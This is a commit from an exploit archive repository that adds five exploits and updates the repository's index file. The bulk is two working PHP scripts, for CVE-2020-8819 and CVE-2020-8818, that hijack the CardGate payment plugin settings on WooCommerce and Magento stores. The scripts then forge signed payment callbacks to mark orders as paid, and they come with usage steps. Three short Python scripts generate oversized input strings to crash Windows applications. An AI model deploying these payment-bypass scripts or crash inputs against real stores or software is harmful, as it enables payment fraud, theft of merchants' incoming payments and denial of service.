DB: 2020-02-26

5 changes to exploits/shellcodes

SpotFTP-FTP Password Recover 2.4.8 - Denial of Service (PoC)
aSc TimeTables 2020.11.4 - Denial of Service (PoC)
Odin Secure FTP Expert 7.6.3 - Denial of Service (PoC)
WordPress Plugin WooCommerce CardGate Payment Gateway 3.1.15 - Payment Process Bypass
Magento WooCommerce CardGate Payment Gateway 2.0.30 - Payment Process Bypass
This commit is contained in:
Offensive Security 2020-02-26 05:01:51 +00:00
parent cf92ea269e
commit 17bb415ff8
6 changed files with 448 additions and 0 deletions

View file

@ -0,0 +1,174 @@
# Exploit Title: WordPress Plugin WooCommerce CardGate Payment Gateway 3.1.15 - Payment Process Bypass
# Discovery Date: 2020-02-02
# Public Disclosure Date: 2020-02-22
# Exploit Author: GeekHack
# Vendor Homepage: https://www.cardgate.com (www.curopayments.com)
# Software Link: https://github.com/cardgate/woocommerce/releases/tag/v3.1.15
# Version: <= 3.1.15
# Tested on: WordPress 5.3.2 + WooCommerce 3.9.1 + CardGate Payment Gateway Plugin 3.1.15
# CVE: CVE-2020-8819
<?php
/*
Description:
Lack of origin authentication (CWE-346) at IPN callback processing function allow (even unauthorized) attacker to remotely replace critical plugin settings (merchant id, secret key etc) with known to him and therefore bypass payment process (eg. spoof order status by manually sending IPN callback request with a valid signature but without real payment) and/or receive all subsequent payments (on behalf of the store).
[code ref: https://github.com/cardgate/woocommerce/blob/f2111af7b1a3fd701c1c5916137f3ac09482feeb/cardgate/cardgate.php#L426-L442]
*/
/*
Usage:
1. Change values of the constants (see below for TARGET & ORDER)
2. Host this script somewhere (must be public accessible)
3. Register a merchant at https://cardgate.com
4. Sign into "My CardGate" dashboard
5. Add fake site or choose existing one
6. Click "Setup your Webshop" button in site preferences
7. Paste the URL of this script into the pop-up window and click "Save"
8. The target store now uses the settings of your site, enjoy :]
P.S. It works perfectly in both Staging and Live modes, regardless of the current mode of the target shop.
*/
// -------- Options (start) --------
define('TARGET', 'http://domain.tld'); // without trailing slash, pls
define('ORDER', 0); // provide non-zero value to automagically spoof order status
// --------- Options (end) ---------
define('API_STAGING', 'https://secure-staging.curopayments.net/rest/v1/curo/');
define('API_PRODUCTION', 'https://secure.curopayments.net/rest/v1/curo/');
/**
* Original function from CardGate API client library (SDK) with minor changes
* @param string $sToken_
* @param bool $bTestmode_
* @return string
*/
function pullConfig($sToken_, $bTestmode_ = FALSE) {
if (!is_string($sToken_)) {
throw new Exception('invalid token for settings pull: ' . $sToken_);
}
$sResource = "pullconfig/{$sToken_}/";
$sUrl = ($bTestmode_ ? API_STAGING : API_PRODUCTION) . $sResource;
$rCh = curl_init();
curl_setopt($rCh, CURLOPT_URL, $sUrl);
curl_setopt($rCh, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($rCh, CURLOPT_TIMEOUT, 60);
curl_setopt($rCh, CURLOPT_HEADER, FALSE);
curl_setopt($rCh, CURLOPT_HTTPHEADER, [
'Content-Type: application/json',
'Accept: application/json'
]);
if ($bTestmode_) {
curl_setopt($rCh, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($rCh, CURLOPT_SSL_VERIFYHOST, 0);
} else {
curl_setopt($rCh, CURLOPT_SSL_VERIFYPEER, TRUE);
curl_setopt($rCh, CURLOPT_SSL_VERIFYHOST, 2);
}
if (FALSE == ($sResults = curl_exec($rCh))) {
$sError = curl_error($rCh);
curl_close($rCh);
throw new Exception('Client.Request.Curl.Error: ' . $sError);
} else {
curl_close($rCh);
}
if (NULL === ($aResults = json_decode($sResults, TRUE))) {
throw new Exception('remote gave invalid JSON: ' . $sResults);
}
if (isset($aResults['error'])) {
throw new Exception($aResults['error']['message']);
}
return $aResults;
}
/**
* Original function from CardGate API client library (SDK) with minor changes
* @param string $sUrl
* @param array $aData_
* @param string $sHttpMethod_
* @return string
*/
function doRequest($sUrl, $aData_ = NULL, $sHttpMethod_ = 'POST') {
if (!in_array($sHttpMethod_, ['GET', 'POST'])) {
throw new Exception('invalid http method: ' . $sHttpMethod_);
}
$rCh = curl_init();
curl_setopt($rCh, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($rCh, CURLOPT_TIMEOUT, 60);
curl_setopt($rCh, CURLOPT_HEADER, FALSE);
curl_setopt($rCh, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($rCh, CURLOPT_SSL_VERIFYHOST, 0);
if ('POST' == $sHttpMethod_) {
curl_setopt($rCh, CURLOPT_URL, $sUrl);
curl_setopt($rCh, CURLOPT_POST, TRUE);
curl_setopt($rCh, CURLOPT_POSTFIELDS, http_build_query($aData_));
} else {
$sUrl = $sUrl
. (FALSE === strchr($sUrl, '?') ? '?' : '&')
. http_build_query($aData_)
;
curl_setopt($rCh, CURLOPT_URL, $sUrl);
}
$response = curl_exec($rCh);
if (FALSE == $response) {
$sError = curl_error($rCh);
curl_close($rCh);
throw new Exception('Client.Request.Curl.Error: ' . $sError);
} else {
curl_close($rCh);
}
return $response;
}
if (!empty($_REQUEST['cgp_sitesetup']) && !empty($_REQUEST['token'])) {
try {
$aResult = pullConfig($_REQUEST['token'], $_REQUEST['testmode']);
$aConfigData = $aResult['pullconfig']['content'];
$response = doRequest(TARGET, $_REQUEST);
if ($response == $aConfigData['merchant'] . '.' . $aConfigData['site_id'] . '.200') {
if (ORDER) {
$payload = [
'testmode' => $_REQUEST['testmode'],
'reference' => random_int(10000000000, 99999999999) . ORDER,
'transaction' => 'T' . str_pad(time(), 11, random_int(0, 9)),
'currency' => '',
'amount' => 0,
'status' => 'success',
'code' => 200
];
$payload['hash'] = md5(
(!empty($payload['testmode']) ? 'TEST' : '')
. $payload['transaction']
. $payload['currency']
. $payload['amount']
. $payload['reference']
. $payload['code']
. $aConfigData['site_key']
);
$response = doRequest(TARGET . '/?cgp_notify=true', $payload);
if ($response == $payload['transaction'] . '.' . $payload['code']) {
die($aConfigData['merchant'] . '.' . $aConfigData['site_id'] . '.200');
} else {
throw new Exception("Unable to spoof order status, but merchant settings was updated successfully ($response)");
}
} else {
die($aConfigData['merchant'] . '.' . $aConfigData['site_id'] . '.200');
}
} else {
throw new Exception("It seems target is not vulnerable ($response)");
}
} catch (\Exception $oException_) {
die(htmlspecialchars($oException_->getMessage()));
}
}

View file

@ -0,0 +1,178 @@
# Exploit Title: Magento WooCommerce CardGate Payment Gateway 2.0.30 - Payment Process Bypass
# Discovery Date: 2020-02-02
# Public Disclosure Date: 2020-02-22
# Exploit Author: GeekHack
# Vendor Homepage: https://www.cardgate.com (www.curopayments.com)
# Software Link: https://github.com/cardgate/magento2/releases/tag/v2.0.30
# Version: <= 2.0.30
# Tested on: Magento 2.3.4 + CardGate Payment Gateway Module 2.0.30
# CVE: CVE-2020-8818
<?php
/*
Description:
Lack of origin authentication (CWE-346) at IPN callback processing function allow (even unauthorized) attacker to remotely replace critical plugin settings (merchant id, secret key etc) with known to him and therefore bypass payment process (eg. spoof order status by manually sending IPN callback request with a valid signature but without real payment) and/or receive all subsequent payments (on behalf of the store).
[code ref: https://github.com/cardgate/magento2/blob/715979e54e1a335d78a8c5586f9e9987c3bf94fd/Controller/Payment/Callback.php#L88-L107]
*/
/*
Usage:
1. Change values of the constants (see below for TARGET & ORDER*)
2. Host this script somewhere (must be public accessible)
3. Register a merchant at https://cardgate.com
4. Sign into "My CardGate" dashboard
5. Add fake site or choose existing one
6. Click "Setup your Webshop" button in site preferences
7. Paste the URL of this script into the pop-up window and click "Save"
8. The target store now uses the settings of your site, enjoy :]
P.S. It works perfectly in both Staging and Live modes, regardless of the current mode of the target shop.
*/
// -------- Options (start) --------
define('TARGET', 'http://domain.tld'); // without trailing slash, pls
define('ORDER', '000000001'); // provide non-zero value to automagically spoof order status
define('ORDER_AMOUNT', 1.00); // provide a valid total (to bypass built-in fraud protection)
define('ORDER_CURRENCY', 'USD'); // provide a valid currency (same goal as above)
define('ORDER_PAYMENT_TYPE', 'sofortbanking'); // provide a valid payment type slug (optional)
// --------- Options (end) ---------
define('API_STAGING', 'https://secure-staging.curopayments.net/rest/v1/curo/');
define('API_PRODUCTION', 'https://secure.curopayments.net/rest/v1/curo/');
/**
* Original function from CardGate API client library (SDK) with minor changes
* @param string $sToken_
* @param bool $bTestmode_
* @return string
*/
function pullConfig($sToken_, $bTestmode_ = FALSE) {
if (!is_string($sToken_)) {
throw new Exception('invalid token for settings pull: ' . $sToken_);
}
$sResource = "pullconfig/{$sToken_}/";
$sUrl = ($bTestmode_ ? API_STAGING : API_PRODUCTION) . $sResource;
$rCh = curl_init();
curl_setopt($rCh, CURLOPT_URL, $sUrl);
curl_setopt($rCh, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($rCh, CURLOPT_TIMEOUT, 60);
curl_setopt($rCh, CURLOPT_HEADER, FALSE);
curl_setopt($rCh, CURLOPT_HTTPHEADER, [
'Content-Type: application/json',
'Accept: application/json'
]);
if ($bTestmode_) {
curl_setopt($rCh, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($rCh, CURLOPT_SSL_VERIFYHOST, 0);
} else {
curl_setopt($rCh, CURLOPT_SSL_VERIFYPEER, TRUE);
curl_setopt($rCh, CURLOPT_SSL_VERIFYHOST, 2);
}
if (FALSE == ($sResults = curl_exec($rCh))) {
$sError = curl_error($rCh);
curl_close($rCh);
throw new Exception('Client.Request.Curl.Error: ' . $sError);
} else {
curl_close($rCh);
}
if (NULL === ($aResults = json_decode($sResults, TRUE))) {
throw new Exception('remote gave invalid JSON: ' . $sResults);
}
if (isset($aResults['error'])) {
throw new Exception($aResults['error']['message']);
}
return $aResults;
}
/**
* Original function from CardGate API client library (SDK) with minor changes
* @param string $sUrl
* @param array $aData_
* @param string $sHttpMethod_
* @return string
*/
function doRequest($sUrl, $aData_ = NULL, $sHttpMethod_ = 'POST') {
if (!in_array($sHttpMethod_, ['GET', 'POST'])) {
throw new Exception('invalid http method: ' . $sHttpMethod_);
}
$rCh = curl_init();
curl_setopt($rCh, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($rCh, CURLOPT_TIMEOUT, 60);
curl_setopt($rCh, CURLOPT_HEADER, FALSE);
curl_setopt($rCh, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($rCh, CURLOPT_SSL_VERIFYHOST, 0);
if ('POST' == $sHttpMethod_) {
curl_setopt($rCh, CURLOPT_URL, $sUrl);
curl_setopt($rCh, CURLOPT_POST, TRUE);
curl_setopt($rCh, CURLOPT_POSTFIELDS, http_build_query($aData_));
} else {
$sUrl = $sUrl
. (FALSE === strchr($sUrl, '?') ? '?' : '&')
. http_build_query($aData_)
;
curl_setopt($rCh, CURLOPT_URL, $sUrl);
}
$response = curl_exec($rCh);
if (FALSE == $response) {
$sError = curl_error($rCh);
curl_close($rCh);
throw new Exception('Client.Request.Curl.Error: ' . $sError);
} else {
curl_close($rCh);
}
return $response;
}
if (!empty($_REQUEST['cgp_sitesetup']) && !empty($_REQUEST['token'])) {
try {
$aResult = pullConfig($_REQUEST['token'], $_REQUEST['testmode']);
$aConfigData = $aResult['pullconfig']['content'];
$response = doRequest(TARGET . '/cardgate/payment/callback', $_REQUEST, 'GET');
if ($response == $aConfigData['merchant_id'] . '.' . $aConfigData['site_id'] . '.200') {
if (ORDER) {
$payload = [
'testmode' => $_REQUEST['testmode'],
'reference' => ORDER,
'transaction' => 'T' . str_pad(time(), 11, random_int(0, 9)),
'currency' => ORDER_CURRENCY,
'amount' => ORDER_AMOUNT * 100,
'status' => 'success',
'code' => 200,
'pt' => ORDER_PAYMENT_TYPE
];
$payload['hash'] = md5(
(!empty($payload['testmode']) ? 'TEST' : '')
. $payload['transaction']
. $payload['currency']
. $payload['amount']
. $payload['reference']
. $payload['code']
. $aConfigData['site_key']
);
$response = doRequest(TARGET . '/cardgate/payment/callback', $payload, 'GET');
if ($response == $payload['transaction'] . '.' . $payload['code']) {
die($aConfigData['merchant'] . '.' . $aConfigData['site_id'] . '.200');
} else {
throw new Exception("Unable to spoof order status, but merchant settings was updated successfully ($response)");
}
} else {
die($aConfigData['merchant'] . '.' . $aConfigData['site_id'] . '.200');
}
} else {
throw new Exception("It seems target is not vulnerable ($response)");
}
} catch (\Exception $oException_) {
die(htmlspecialchars($oException_->getMessage()));
}
}

27
exploits/windows/dos/48132.py Executable file
View file

@ -0,0 +1,27 @@
# Exploit Title: SpotFTP-FTP Password Recover 2.4.8 - Denial of Service (PoC)
# Date: 2020-24-02
# Exploit Author: Ismael Nava
# Vendor Homepage: http://www.nsauditor.com/
# Software Link: http://www.nsauditor.com/spotftp.html
# Version: 2.4.8
# Tested on: Windows 10 Home x64
# CVE : n/a
#STEPS
# Open the program SpotFTP-FTP Password Recover
# Run the python exploit script, it will create a new .txt files
# Copy the content of the file "RandomLetter.txt"
# Click in the Enter Registration Code
# In the field Key put the content of the file "RandomLetter.txt"
# End :)
buffer = 'Z' * 1000
try:
file = open("RandomLetter.txt","w")
file.write(buffer)
file.close()
print("Archive ready")
except:
print("Archive no ready")

32
exploits/windows/dos/48133.py Executable file
View file

@ -0,0 +1,32 @@
# Exploit Title: aSc TimeTables 2020.11.4 - Denial of Service (PoC)
# Date: 2020-24-02
# Exploit Author: Ismael Nava
# Vendor Homepage: https://www.asctimetables.com/#!/home
# Software Link: https://www.asctimetables.com/#!/home/download
# Version: 2020.11.4
# Tested on: Windows 10 Home x64
# CVE : n/a
# STEPS
# Open the program aSc Timetables 2020
# In File select the option New
# Put any letter in the fiel Name of the Schooland click Next
# In the next Windows click NEXT
# In the Step 3, in Subject click in New
# Run the python exploit script, it will create a new .txt files
# Copy the content of the file "Tables.txt"
# Paste the content in the field Subject title
# Click in OK
# End :)
buffer = 'Z' * 1000
try:
file = open("Tables.txt","w")
file.write(buffer)
file.close()
print("Archive ready")
except:
print("Archive no ready")

32
exploits/windows/dos/48136.py Executable file
View file

@ -0,0 +1,32 @@
# Exploit Title : Odin Secure FTP Expert 7.6.3 - Denial of Service (PoC)
# Exploit Author : Berat Isler
# Date : 2020-02-25
# Vendor Homepage : https://odin-secure-ftp-expert.jaleco.com/
# Software Link Download :
http://tr.oldversion.com/windows/odin-secure-ftp-expert-7-6-3
# Version : Odin Secure FTP Expert 7.6.3
# Tested on : Windows 7 32-bit
# First step , run exploit script, it will generate a new file with the
name "bune.txt"
# Then start Odin Secure FTP application and find the "connect" tab . After
that you can click
Quickconnect site tab.
# After that paste the content of "bune.txt" in to the all fields like this
--> "AAAAAA" than click connect button
# Application will be crash .
This is the generated payload code :
#!/usr/bin/python
bune = "A" * 6000
payload = bune
try:
f=open("bune.txt","w")
print "[+] Creating %s bytes payload generated .. .. .." %len(payload)
f.write(payload)
f.close()
print "[+] File created "
except:
print "File cannot be created"

View file

@ -6681,6 +6681,9 @@ id,file,description,date,author,type,platform,port
48100,exploits/windows/dos/48100.py,"Core FTP Lite 1.3 - Denial of Service (PoC)",2020-02-20,"berat isler",dos,windows,
48111,exploits/windows/dos/48111.py,"Quick N Easy Web Server 3.3.8 - Denial of Service (PoC)",2020-02-24,"Cody Winkler",dos,windows,
48121,exploits/linux/dos/48121.py,"Go SSH servers 0.0.2 - Denial of Service (PoC)",2020-02-24,"Mark Adams",dos,linux,
48132,exploits/windows/dos/48132.py,"SpotFTP-FTP Password Recover 2.4.8 - Denial of Service (PoC)",2020-02-25,"Ismael Nava",dos,windows,
48133,exploits/windows/dos/48133.py,"aSc TimeTables 2020.11.4 - Denial of Service (PoC)",2020-02-25,"Ismael Nava",dos,windows,
48136,exploits/windows/dos/48136.py,"Odin Secure FTP Expert 7.6.3 - Denial of Service (PoC)",2020-02-25,"berat isler",dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -42399,3 +42402,5 @@ id,file,description,date,author,type,platform,port
48125,exploits/aspx/webapps/48125.txt,"DotNetNuke 9.5 - File Upload Restrictions Bypass",2020-02-24,"Sajjad Pourali",webapps,aspx,
48127,exploits/hardware/webapps/48127.pl,"Aptina AR0130 960P 1.3MP Camera - Remote Configuration Disclosure",2020-02-24,"Todor Donev",webapps,hardware,
48128,exploits/php/webapps/48128.py,"Cacti 1.2.8 - Remote Code Execution",2020-02-24,Askar,webapps,php,
48134,exploits/php/webapps/48134.php,"WordPress Plugin WooCommerce CardGate Payment Gateway 3.1.15 - Payment Process Bypass",2020-02-25,GeekHack,webapps,php,
48135,exploits/php/webapps/48135.php,"Magento WooCommerce CardGate Payment Gateway 2.0.30 - Payment Process Bypass",2020-02-25,GeekHack,webapps,php,

Can't render this file because it is too large.